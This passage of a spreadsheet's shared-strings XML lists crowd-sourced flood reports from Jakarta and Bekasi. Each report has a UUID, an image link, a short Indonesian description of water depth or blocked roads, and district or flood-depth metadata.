    <t>https://images.petabencana.id/5197c776-7ce2-4866-abe9-b7aaf57b6e78.jpg</t>
  </si>
  <si>
    <t>52ddf88a-a854-4c3e-9596-a51a4b314c3d</t>
  </si>
  <si>
    <t>Hujan semakin deras. Untuk saat ini 06.13 wib banjir sudah selutut orang dewasa</t>
  </si>
  <si>
    <t>92e448d5-67aa-4045-adb3-e6f21252e4dc</t>
  </si>
  <si>
    <t>8afd8ef9-98f3-44d3-9d23-cc90ac554115</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8afd8ef9-98f3-44d3-9d23-cc90ac554115.jpg</t>
  </si>
  <si>
    <t>Lingkungan Perum Permata Penggilingan Cakung Jakarta Timur</t>
  </si>
  <si>
    <t>a65fd31e-ada8-49a4-9d74-96c8a021c249</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a65fd31e-ada8-49a4-9d74-96c8a021c249.jpg</t>
  </si>
  <si>
    <t>Perumahan Pejuang Pratama</t>
  </si>
  <si>
    <t>6fdcd3ef-2b58-4b51-aae4-214c6084f668</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6fdcd3ef-2b58-4b51-aae4-214c6084f668.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 35, "report_type": "flood" }</t>
  </si>
  <si>
    <t>d981e92d-fb46-4792-8c0e-f3ff57d19de0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d981e92d-fb46-4792-8c0e-f3ff57d19de0.jpg</t>
  </si>
  <si>
    <t>Air naik lagi.. kavling bps</t>
  </si>
  <si>
    <t>a59d865a-e7ef-4e1b-9370-c77f40de394e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a59d865a-e7ef-4e1b-9370-c77f40de394e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "601", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir didalam rumah sudah setinggi perut sementara di jalan luar sudah melebihi betis orang dewasa</t>
  </si>
  <si>
    <t>261bdde8-1567-4565-95e3-38e5273f2688</t>
  </si>
  <si>
    <t>Pintu 1 jiep tidak bisa di lewati</t>
  </si>
  <si>
    <t>bb773d33-316e-4407-990c-9f43efe876d8</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1913", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mobil motor tidak bisa lewat</t>
  </si>
  <si>
    <t>c6c19f6b-f6fc-48a0-8c45-b7914098cd6d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c6c19f6b-f6fc-48a0-8c45-b7914098cd6d.jpg</t>
  </si>
  <si>
    <t>Genangan disekitar tol bekasi barat, macetttt</t>
  </si>
  <si>
    <t>2f8be5ee-4c53-489a-9ee4-86ed2443428b</t>
  </si>
  <si>
    <t>Villa Jatibening Tol dan Jalan depannya banjir</t>
  </si>
  <si>
    <t>3f994e20-6fa2-437c-8594-b44904ef2ba1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f994e20-6fa2-437c-8594-b44904ef2ba1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2108", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jembatan Besi</t>
  </si>
  <si>
    <t>fa6ff927-3a26-4026-b442-fdd151db7c34</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fa6ff927-3a26-4026-b442-fdd151db7c34.jpg</t>
  </si>
  <si>
    <t>78f47f1c-74c2-4bd4-b2b1-9bb099af65c7</t>
  </si>
  <si>
    <t>Banjir di daerah Taman Galaxy dari jam 3 pagi, air tambah naik</t>
  </si>
  <si>
    <t>04684169-4dd5-4557-8b93-7ad8e7cc7099</t>
  </si>
  <si>
    <t>Terlalu banyak pembangunan tol dan LRT . Sudah 2x banjir bulan ini. Apa kabar BKT?</t>
  </si>
  <si>
    <t>781f382b-e294-4217-ad08-e6e835af63e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/781f382b-e294-4217-ad08-e6e835af63e1.jpg</t>
  </si>
  <si>
    <t>Banjir karena air tidak bisa masuk ke kali. Tidak ada saluran pembuangan ke kali setelah kali diperbaiki.</t>
  </si>
  <si>
    <t>7f67d07b-3a2d-4423-aa78-23b674b5aa5e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f67d07b-3a2d-4423-aa78-23b674b5aa5e.jpg</t>
  </si>
  <si>
    <t>Banjirr parah</t>
  </si>
  <si>
    <t>fdcecfb8-0c82-4b9e-8f3c-551eec567731</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fdcecfb8-0c82-4b9e-8f3c-551eec567731.jpg</t>
  </si>
  <si>
    <t>Banjir 20-30cm menggenangi komplek wisma tajur</t>
  </si>
  <si>
    <t>Tajur</t>
  </si>
  <si>
    <t>8b0f7f01-a804-4a84-9106-f3fa5bc5dce7</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1598", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lokasi Setu, Cipayung, Jakarta Timur banjir sudah mulai naik setinggi dengkul orang dewasa</t>
  </si>
  <si>
    <t>e9c89eed-f099-47b1-93b0-9d81ddc119e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e9c89eed-f099-47b1-93b0-9d81ddc119e9.jpg</t>
  </si>
  <si>
    <t>44f2a73d-336a-4ac8-ac69-1f23d30c2bf3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/44f2a73d-336a-4ac8-ac69-1f23d30c2bf3.jpg</t>
  </si>
  <si>
    <t>jl timbul jaya rt009/04 duri kosambi cengkareng</t>
  </si>
  <si>
    <t>889f5cc5-63b0-4108-9544-0932017cf28d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/889f5cc5-63b0-4108-9544-0932017cf28d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1916", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>68c5bdaa-e5af-4138-a519-56a7defb2653</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68c5bdaa-e5af-4138-a519-56a7defb2653.jpg</t>
  </si>
  <si>
    <t>64de5475-db3b-4408-8b05-be15a5be2096</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64de5475-db3b-4408-8b05-be15a5be2096.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 148 }</t>
  </si>
  <si>
    <t>rt01 rw03 kel. jaticempaka</t>
  </si>
  <si>
    <t>d0ce4f02-802a-4541-9380-b1dfeae610d2</t>
  </si>
  <si>
    <t>Kebon baru ... Arah ke stasiun tebet banjir</t>
  </si>
  <si>
    <t>57bfdf9e-a6f5-4973-b61c-7d94bb581c40</t>
  </si>
  <si>
    <t>https://images.petabencana.id/57bfdf9e-a6f5-4973-b61c-7d94bb581c40.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 121 }</t>
  </si>
  <si>
    <t>banjir se dada, saya bersama mama dan suami terjebak di lt atas</t>
  </si>
  <si>
    <t>da482e14-6246-486f-bd1d-5d57e1c4b396</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da482e14-6246-486f-bd1d-5d57e1c4b396.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "25", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1563e0dd-8a27-4095-9ef6-7a39e81c1e64</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1563e0dd-8a27-4095-9ef6-7a39e81c1e64.jpg</t>
  </si>
  <si>
    <t>Tinggi air +_ selutut orang dewasa, di kemayoran gempol ,belakang masjid akbar kemayoran</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349513</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/1582586299892866691.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1385", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan Masih Mengguyur, Jalan Depan Kemenaker Ada Genagan Air</t>
  </si>
  <si>
    <t>Jalan jenderal gatot Subroto depan kementerian tenaga kerja banjir genangan air ini</t>
  </si>
  <si>
    <t>efb075b6-fcfa-4675-adf0-51442f665426</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1886", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Semata kaki orang dewas</t>
  </si>
  <si>
    <t>Krukut</t>
  </si>
  <si>
    <t>fcd50d19-4710-4d23-a5d5-4c66922282d5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fcd50d19-4710-4d23-a5d5-4c66922282d5.jpg</t>
  </si>
  <si>
    <t>masjid Darul hikam. komplek Antilop. kel. jaticempaka</t>
  </si>
  <si>
    <t>42b92e66-0339-4e9a-ab9a-bcd59f41a994</t>
  </si>
  <si>
    <t>https://images.petabencana.id/42b92e66-0339-4e9a-ab9a-bcd59f41a994.jpg</t>
  </si>
  <si>
    <t>Air sudah masuk rumah setinggi 30 cm</t>
  </si>
  <si>
    <t>0d3770e7-c9f2-444a-b813-d03a62848cf6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0d3770e7-c9f2-444a-b813-d03a62848cf6.jpg</t>
  </si>
  <si>
    <t>KOMPLEK PONDOK BAMBU ASRI</t>
  </si>
  <si>
    <t>b769644a-cea4-4745-9804-368733edb891</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b769644a-cea4-4745-9804-368733edb891.jpg</t>
  </si>
  <si>
    <t>Banjir Halim Airport 75-100CN</t>
  </si>
  <si>
    <t>03a74aa2-b3c5-4db3-b06d-6a4a5ea7241f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03a74aa2-b3c5-4db3-b06d-6a4a5ea7241f.jpg</t>
  </si>
  <si>
    <t>Depan Pom bensin pemuda deket UNJ</t>
  </si>
  <si>
    <t>b7c8cf3f-16e3-48e5-8dba-e5d7f8c029ae</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "616", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir ada yg selutut, ada yg sebetis</t>
  </si>
  <si>
    <t>Serdang</t>
  </si>
  <si>
    <t>63f77854-3901-4204-94ee-122d51c52ba8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63f77854-3901-4204-94ee-122d51c52ba8.jpg</t>
  </si>
  <si>
    <t>Jl.Pulosirih Tengah 10 Blok BD no 27, Taman Galaxi-Bekasi Selatan.</t>
  </si>
  <si>
    <t>0e717bf7-effe-4e1d-8e34-90618ad521d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0e717bf7-effe-4e1d-8e34-90618ad521d0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1871", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tinggi Air 85-100CM Arah bandara Halim (kali samping jalan airport)</t>
  </si>
  <si>
    <t>5363255d-dcee-4850-be86-8d94e6c04343</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5363255d-dcee-4850-be86-8d94e6c04343.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 141, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di karet tengsin rt 12 rw 7</t>
  </si>
  <si>
    <t>af3919ac-c131-4ef7-9be6-ce8beffe971a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/af3919ac-c131-4ef7-9be6-ce8beffe971a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2478", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Smk walisongo jakarta kebanjiran</t>
  </si>
  <si>
    <t>01f60c15-68c3-4ea0-9a0a-283f7ab38d21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/01f60c15-68c3-4ea0-9a0a-283f7ab38d21.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2420", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>9213efea-d643-491b-b3df-0350fb0e3818</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9213efea-d643-491b-b3df-0350fb0e3818.jpg</t>
  </si>
  <si>
    <t>Jalanan tidak bisa dilewati kendaraan jenis apapun</t>
  </si>
  <si>
    <t>4d877059-24b7-4672-a8fc-13f4468f41cb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d877059-24b7-4672-a8fc-13f4468f41cb.jpg</t>
  </si>
  <si>
    <t>Ini selutut karna rada tanjakan tp dijalanan komplek udh sepinggang. Di perumahan PPA jatiasih Bekasi Selatan</t>
  </si>
  <si>
    <t>Jatirasa</t>
  </si>
  <si>
    <t>cf317e8c-ce85-4e19-8334-3b3ee3ed7a50</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cf317e8c-ce85-4e19-8334-3b3ee3ed7a50.jpg</t>
  </si>
  <si>
    <t>Perumahan karang satria residen, perumahan griya asri,.</t>
  </si>
  <si>
    <t>1432a22d-28b3-4213-84e5-1de1ec1d0b73</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "513", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir +/- 30cm</t>
  </si>
  <si>
    <t>Kebon Kelapa</t>
  </si>
  <si>
    <t>5a2592e9-2318-4f94-8469-a55e1d58bac7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a2592e9-2318-4f94-8469-a55e1d58bac7.jpg</t>
  </si>
  <si>
    <t>Jalan DPS</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349514</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825864581183570129.jpg</t>
  </si>
  <si>
    <t>Hujan Tinggi, Jl Prof Dr Hamka - Larangan Tidak Bisa Dilalui</t>
  </si>
  <si>
    <t>Intensitas Hujan lumayan tinggi, Jl. Prof Dr Hamka - Larangan,Tangerang, tidak bisa dilewati pagi ini.</t>
  </si>
  <si>
    <t>84f83335-8e28-47d7-8294-1127f3a82703</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84f83335-8e28-47d7-8294-1127f3a82703.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2242", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>0f18864a-cba4-4787-a4ea-c742b170f2c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0f18864a-cba4-4787-a4ea-c742b170f2c1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2550", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masi cukup aman dilewati</t>
  </si>
  <si>
    <t>Pademangan Timur</t>
  </si>
  <si>
    <t>a0229f75-ecd3-4c9d-960d-22a15784c53c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0229f75-ecd3-4c9d-960d-22a15784c53c.jpg</t>
  </si>
  <si>
    <t>fffb83d9-5e32-4efd-90ef-ca3840fb6218</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fffb83d9-5e32-4efd-90ef-ca3840fb6218.jpg</t>
  </si>
  <si>
    <t>Di Margahayu airnya udh pada masuk rumah warga</t>
  </si>
  <si>
    <t>09d60114-6791-4f32-b4e4-7c5d0dc4f36d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09d60114-6791-4f32-b4e4-7c5d0dc4f36d.jpg</t>
  </si>
  <si>
    <t>Depan villa jatibening tol</t>
  </si>
  <si>
    <t>efc3d834-75a2-4700-90f8-95f1e11e8fc2</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2696", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Traffic light swadarma raya banjir</t>
  </si>
  <si>
    <t>4d22a59c-2965-428c-a65c-cefd77fc4922</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d22a59c-2965-428c-a65c-cefd77fc4922.jpg</t>
  </si>
  <si>
    <t>06e2210b-d542-4f9c-afdd-4a2f1694cd2f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06e2210b-d542-4f9c-afdd-4a2f1694cd2f.jpg</t>
  </si>
  <si>
    <t>2c607b21-03ba-471f-ad99-1e1e07222f81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2c607b21-03ba-471f-ad99-1e1e07222f81.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "136", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di belakang kantor camat kebon jeruk.. pinggir kali pesanggrahan</t>
  </si>
  <si>
    <t>4d8e1a61-2b99-4676-bd92-feb058c49b4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d8e1a61-2b99-4676-bd92-feb058c49b4e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1436", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepaha di jalan</t>
  </si>
  <si>
    <t>934a4a37-cefc-4f83-a391-687ade696d2e</t>
  </si>
  <si>
    <t>Swadarma raya banjir selutut</t>
  </si>
  <si>
    <t>0b7fbc59-f887-4bf8-8709-8c2752c560f5</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 61, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "41", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir cuk libur kampus uda</t>
  </si>
  <si>
    <t>c8584af9-aeb5-46e3-abd9-0576f36c04c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c8584af9-aeb5-46e3-abd9-0576f36c04c7.jpg</t>
  </si>
  <si>
    <t>sudah banjir sedengkul orang dewasa di Jalan Rawa Jaya II dan Jalan Bujana Tirta 2 Kelurahan Pisangan Timur, Kecamatan Pulogadung Jaktim</t>
  </si>
  <si>
    <t>40309df5-7621-475d-9d2b-5bbd5ec2d0a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40309df5-7621-475d-9d2b-5bbd5ec2d0a0.jpg</t>
  </si>
  <si>
    <t>Banjir 50cm+ area perumahan Sukapura</t>
  </si>
  <si>
    <t>0814020f-236d-4a6e-90b8-396daae28138</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0814020f-236d-4a6e-90b8-396daae28138.jpg</t>
  </si>
  <si>
    <t>Banjer</t>
  </si>
  <si>
    <t>3a0bf3a0-b316-4b1a-9b4c-8c085ea95aa9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a0bf3a0-b316-4b1a-9b4c-8c085ea95aa9.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek Duta Indah, Bekasi</t>
  </si>
  <si>
    <t>7bfa8442-7d7d-4956-80ca-a4e44131a4f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7bfa8442-7d7d-4956-80ca-a4e44131a4f9.jpg</t>
  </si>
  <si>
    <t>Banjir di pintu masuk tol bekasi barat arah Jakarta</t>
  </si>
  <si>
    <t>09f5ffc2-aed1-4663-9617-94845a9f26a2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09f5ffc2-aed1-4663-9617-94845a9f26a2.jpg</t>
  </si>
  <si>
    <t>Banjir Jl. Komodor Halim Perdana Kusuma Gang Majelis RT. 008 RW. 01 Nomor 9 Kelurahan Kebon Pala Kecamatan Makasar Jakarta Timur 13650."</t>
  </si>
  <si>
    <t>52811c51-7254-4362-8bfd-149b44f157db</t>
  </si>
  <si>
    <t>Banjir 2m di jalan</t>
  </si>
  <si>
    <t>486a98b0-8932-400b-87be-f73a047ae119</t>
  </si>
  <si>
    <t>https://images.petabencana.id/486a98b0-8932-400b-87be-f73a047ae119.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1945", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pukul 6.43</t>
  </si>
  <si>
    <t>1254d6f2-9caa-442e-825b-5c5f193855ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1254d6f2-9caa-442e-825b-5c5f193855ba.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "339", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjit area tamansari setinggi dengkul orang dewasa</t>
  </si>
  <si>
    <t>Mangga Besar</t>
  </si>
  <si>
    <t>99665f8c-30a5-4688-8aa4-d8fed46daced</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99665f8c-30a5-4688-8aa4-d8fed46daced.jpg</t>
  </si>
  <si>
    <t>Banjir di dekat flyover rawa panjang karena drainase buruk</t>
  </si>
  <si>
    <t>b02bb7d8-be92-4fd7-b23f-b3cdbdf143ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b02bb7d8-be92-4fd7-b23f-b3cdbdf143ec.jpg</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349517</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825870731987280879.jpg</t>
  </si>
  <si>
    <t>Sungai Ciliwung Meluap, Sekitaran Bidara Cina Kebanjiran</t>
  </si>
  <si>
    <t>Ciliwung meluap lagi ini, Bidara Cina dan Kebon Baru mendapatkan banjir kiriman.</t>
  </si>
  <si>
    <t>01007da3-5e58-4388-a86a-effb5e1a3ae3</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "676", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kramat Raya, Jl. Pal putih</t>
  </si>
  <si>
    <t>27997e4c-2487-46cc-8ac9-1ad271f82215</t>
  </si>
  <si>
    <t>https://images.petabencana.id/27997e4c-2487-46cc-8ac9-1ad271f82215.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 43, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Perempatan matraman arah salemba-kp melayu tergenang parah. Selalu waspada dan berhati-hati"</t>
  </si>
  <si>
    <t>9cb0422f-50dc-46b2-af7c-a5170c7fdde7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9cb0422f-50dc-46b2-af7c-a5170c7fdde7.jpg</t>
  </si>
  <si>
    <t>Banjir daerah klender se betis</t>
  </si>
  <si>
    <t>713037b4-8795-4fb2-acbf-2d5148b8c368</t>
  </si>
  <si>
    <t>https://images.petabencana.id/713037b4-8795-4fb2-acbf-2d5148b8c368.jpg</t>
  </si>
  <si>
    <t>b8539b15-09d5-4496-9e83-57554766a9e2</t>
  </si>
  <si>
    <t>per-3an antilop banjir parah, bisa se dada orang dewasa. Semua jenis kendaraan gabisa lewat + banyak mobil parkir</t>
  </si>
  <si>
    <t>9cc79c0a-3a5c-445d-b0dd-70d95ab012f3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9cc79c0a-3a5c-445d-b0dd-70d95ab012f3.jpg</t>
  </si>
  <si>
    <t>6a654093-e1c5-482b-b502-5b8cdf428e1e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6a654093-e1c5-482b-b502-5b8cdf428e1e.jpg</t>
  </si>
  <si>
    <t>Perum duta kranji banjir d luar sedengkul orang dewasa. D dlm rumh sebetis</t>
  </si>
  <si>
    <t>fcd5c3af-fdfc-4fe1-850e-11ad88125496</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fcd5c3af-fdfc-4fe1-850e-11ad88125496.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "612", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>174df29a-dbbd-4f38-9de6-c297ec0cc364</t>
  </si>
  <si>
    <t>https://images.petabencana.id/174df29a-dbbd-4f38-9de6-c297ec0cc364.jpg</t>
  </si>
  <si>
    <t>Ketinggian sekitar 30-40 cm.</t>
  </si>
  <si>
    <t>1d17ee76-0bb7-4fd9-abea-d6bf27a99d9d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d17ee76-0bb7-4fd9-abea-d6bf27a99d9d.jpg</t>
  </si>
  <si>
    <t>1ba25776-86f4-4d3a-b286-8f56c0b213af</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ba25776-86f4-4d3a-b286-8f56c0b213af.jpg</t>
  </si>
  <si>
    <t>Seluruh kelapa hibrida</t>
  </si>
  <si>
    <t>d978c9b2-3eaf-4715-ae95-ea1060a782ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d978c9b2-3eaf-4715-ae95-ea1060a782ed.jpg</t>
  </si>
  <si>
    <t>00e99999-bbb4-4119-a2e5-db4a8d829db1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00e99999-bbb4-4119-a2e5-db4a8d829db1.jpg</t>
  </si>
  <si>
    <t>Sekitar Jalan Patuha Bekasi Selatan banjir sebetis</t>
  </si>
  <si>
    <t>7f76e5fd-fb02-407b-bee9-cba789ab6bf1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f76e5fd-fb02-407b-bee9-cba789ab6bf1.jpg</t>
  </si>
  <si>
    <t>Ketinggian 30-40 cm</t>
  </si>
  <si>
    <t>071d05a3-5a4b-4861-a6fc-b744858bc834</t>
  </si>
  <si>
    <t>https://images.petabencana.id/071d05a3-5a4b-4861-a6fc-b744858bc834.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan wisma jaya bekasi timur</t>
  </si>
  <si>
    <t>b142764f-5624-4e20-a31a-691f797c4ec5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b142764f-5624-4e20-a31a-691f797c4ec5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "786", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kebon kacang - kebon sirih jam 6.50</t>
  </si>
  <si>
    <t>9ef953d2-ba2c-472f-8702-264479850f0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ef953d2-ba2c-472f-8702-264479850f0a.jpg</t>
  </si>
  <si>
    <t>Foto diambil ketika masih sebetis, sekarang sudah sepinggang,.listrik dimatikan sendiri dulu untuk keamanan. Lokasi Jl. Dermaga Baru I  Kle"</t>
  </si>
  <si>
    <t>b4aab108-3f12-49a7-a870-13d903126dec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4aab108-3f12-49a7-a870-13d903126dec.jpg</t>
  </si>
  <si>
    <t>Rt 14/16 kapuk cengkareng  banjir 10-40cm</t>
  </si>
  <si>
    <t>5bc7a47e-aa47-4348-a3e2-65aa116c9b76</t>
  </si>
  <si>
    <t>Kawasan industri pulogadung</t>
  </si>
  <si>
    <t>514f5b4e-ee9a-4033-918c-4b30b30417ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/514f5b4e-ee9a-4033-918c-4b30b30417ce.jpg</t>
  </si>
  <si>
    <t>Banjir dari jam 4.30 sekitar 20-30 cm</t>
  </si>
  <si>
    <t>1e475f54-b179-4991-837e-436d372b9c9f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e475f54-b179-4991-837e-436d372b9c9f.jpg</t>
  </si>
  <si>
    <t>Banjir di Jatibening 2</t>
  </si>
  <si>
    <t>c5de2f9a-a704-4bb4-bccb-f72b758bbed8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5de2f9a-a704-4bb4-bccb-f72b758bbed8.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "397", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Jl.Bandengan Utara 3 sekitar 30-40cm</t>
  </si>
  <si>
    <t>Pekojan</t>
  </si>
  <si>
    <t>7aa7b26a-ad79-4a4d-a04b-fe7112910f86</t>
  </si>
  <si>
    <t>Perumnas 3 banjir tepatnya dijalan maluku</t>
  </si>
  <si>
    <t>dfcf7b1d-f1f2-4542-baf4-e39b17ea6c11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dfcf7b1d-f1f2-4542-baf4-e39b17ea6c11.jpg</t>
  </si>
  <si>
    <t>Belum surut</t>
  </si>
  <si>
    <t>12d4aab1-884e-449a-8dcf-b6ae8f8c4a55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12d4aab1-884e-449a-8dcf-b6ae8f8c4a55.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "792", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan masjid keramat, mangga dua</t>
  </si>
  <si>
    <t>e579647f-4e60-40df-b128-660d0036b9b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e579647f-4e60-40df-b128-660d0036b9b2.jpg</t>
  </si>
  <si>
    <t>Foto merupakan awal banjir, sekarang sudah lebih tinggi lagi dikarenakan hujan yg terus mengalir.</t>
  </si>
  <si>
    <t>3fd9e4fe-7161-454c-8454-eaec2e75e225</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3fd9e4fe-7161-454c-8454-eaec2e75e225.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "765", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lebih tinggi dari lutut orang dewasa</t>
  </si>
  <si>
    <t>Bendungan Hilir</t>
  </si>
  <si>
    <t>4d73df72-847c-480c-814e-946fb445bc33</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d73df72-847c-480c-814e-946fb445bc33.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "57", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Setiap hujan banjir sekarang</t>
  </si>
  <si>
    <t>54d1ad97-9d2e-443c-9e21-aaf6cdf0c7ae</t>
  </si>
  <si>
    <t>Banjir ringan di kompleks ruko bahan bangunan</t>
  </si>
  <si>
    <t>399b2731-a218-4530-b263-4ba338ecc3f3</t>
  </si>
  <si>
